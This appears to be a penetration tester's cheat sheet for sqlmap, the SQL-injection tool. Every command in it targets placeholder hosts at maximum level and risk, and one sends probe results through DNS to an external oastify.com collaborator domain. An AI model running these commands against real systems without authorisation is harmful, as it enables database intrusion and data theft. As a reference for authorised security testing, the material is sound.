# SQLmap

### Documentation

<https://github.com/sqlmapproject/sqlmap/wiki/Usage>

### From Request - HTTP:80

```
sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 
```

### From Request - HTTPS:443

```
sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 
```

Alternatively, the http.request file must contain the HTTP header `Host: server:443`.

### Batch Silent Mode without questions

```
sqlmap -r http.request --force-ssl --answers="follow=Y" --batch
```

### DNS Collaborator (under root)

Tip: register a new HTTP proxy listener on port 8081 and send all sqlmap probes to this listener, so that you can filter the proxy history by the sqlmap listener.

Use the `--dns-domain` switch to instruct sqlmap to use DNS probes against your collaborator server.

```
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5
```

### Tampering

Tamper scripts encode the payload; select them with the `--tamper` switch.

```
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8080 --tamper="charencode" 
```

A list of all existing tamper scripts is available with the `--list-tampers` switch or in the `/tamper` folder of the GitHub repository:

<https://github.com/sqlmapproject/sqlmap/tree/master/tamper>

### URL target & Parameters

```
sqlmap -u "http://domain?id=1" -p id
```

You can read the HTTP request from a file and mark the injection point with an asterisk (`*`).

```
sqlmap -r ./sql.req

# sql.req is the following file containing the HTTP request, using an asterisk (*) to mark the injection point
GET /path/to/username* HTTP/1.1
Host: servername:port
```

### HTTP Proxy

```
sqlmap --proxy=http://127.0.0.1:8080 
```

### Databases

The most common DBMSs are listed below; for the remaining ones, see [sqlmap wiki --dbms](https://github.com/sqlmapproject/sqlmap/wiki/Usage#force-the-dbms).

```
--dbms=mssql|mysql|postgresql|oracle
```

### Base64 Encoding

By default, sqlmap URL-encodes values in the query string. When the payload must be Base64-encoded instead, use the following switch with the parameter name:

```
sqlmap -u "domain?p1=value" --base64=p1
```

### HTTP method - DELETE

```
sqlmap --method=DELETE -u http://domain -p param1
```

